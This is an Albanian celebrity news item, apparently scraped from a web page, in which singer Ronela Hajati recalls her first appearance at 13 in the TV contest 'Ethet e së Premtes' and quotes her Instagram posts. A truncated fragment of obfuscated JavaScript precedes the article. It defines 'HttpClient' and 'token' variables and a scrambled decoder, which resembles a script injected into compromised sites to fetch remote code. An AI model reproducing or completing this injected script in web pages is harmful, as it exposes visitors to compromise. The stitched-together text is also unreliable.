;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ju kujtohet Ronela Hajati në “Ethet e së Premtes”?

By

“Ethet e së Premtes”, ishte një nga konkurset televizive të këndimit, që i dha këmbë shumë artistëve të sotëm.

Një nga ata është edhe këngëtarja, Ronela Hajati, e cila sapo na ktheu shumë pas në kohë me postimet e saj të fundit në Instagram.

Ajo aso kohe ishte vetëm një vogëlushe 13-vjecare që përjetonte së pari herë emocionet e një skene të madhe.

“Ishin “Ethet” e para dhe kur kam fituar kete fazen jam hedhur perpjete nga gezimi si kurre ndonjehere! Mu mbushen syte me lot kur e pashe,ndoshta nga naiviteti ,dashuria e madhe dhe endrrat e pafundme per muziken ,e nese do kisha mundsi do e perqafoja veten fort kur shoh sa shume gjera kane ndikuar ne karakterin tone! Ama shpirtin ,syte,shprehine dhe dashurine e kam te njejten … si diten e pare qe pashe kamerat kur u ndezen ! Kam qene vetem 13 vjeç dhe me konsideronin si “perjashtimin” e konkursit se isha shume e vogel…. sot pas 17 viteve i lutem Zotit per shendet e jete te gjate se Ronela e vogel e meriton ti realizoje gjithe endrrat e saj! 😭❤️“, shkruan artistja.

Ndërsa, në një tjetër postim, Ronela tregon se ajo ishte hera e parë kur i rregulloi flokët në parukeri dhe se e priti e gjithë shkolla si presidente.

“Ketu u rregulluan floket per here te pare ne parukeri dhe u blene cizmet e famshme me maje ,trendi i momentit.Me priti gjjthe shkolla si presidente te nesermen dhe pastaj histori”, shkruan ajo me shaka. /Prive.al

Artikuj të ngjashëm